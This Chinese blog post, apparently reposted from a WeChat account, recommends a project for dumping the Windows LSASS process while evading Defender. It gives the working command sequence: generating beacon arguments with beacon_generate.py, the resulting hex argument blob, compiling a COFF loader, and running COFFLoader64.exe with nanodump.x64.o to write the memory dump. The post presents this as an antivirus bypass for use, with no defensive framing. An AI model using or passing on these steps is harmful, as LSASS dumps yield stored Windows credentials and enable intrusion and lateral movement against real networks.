绕过Defender Dump Lsass进程(项目推荐)

admin

102795
文章

87
评论

2023年12月4日02:53:45评论45 views字数 978阅读3分15秒阅读模式

这里推荐一个老外的Dump lsass进程的一个项目。

一般Dump lsass进程的方式都会被Defender拦截掉。

直接转储:

绕过Defender Dump Lsass进程(项目推荐)

使用rundll32.exe

绕过Defender Dump Lsass进程(项目推荐)

processdump:

绕过Defender Dump Lsass进程(项目推荐)

使用老外的项目:

python3 beacon_generate.py

python3 beacon_generate.py   Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>

编译文件

cd COFF-mastermake

落地执行:

COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000

defender:

绕过Defender Dump Lsass进程(项目推荐)

项目地址回复20231202获取。

原文始发于微信公众号（Relay学安全）：绕过Defender Dump Lsass进程(项目推荐)

左青龙
微信扫一扫

右白虎
微信扫一扫

绕过Defender Dump Lsass进程(项目推荐)

kalilinux虚拟机安装完整过程

THM平台|Dogcat靶机记录

Hackerone 被黑，看我如何窃取你的POC！

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

发表评论

在线咨询

微信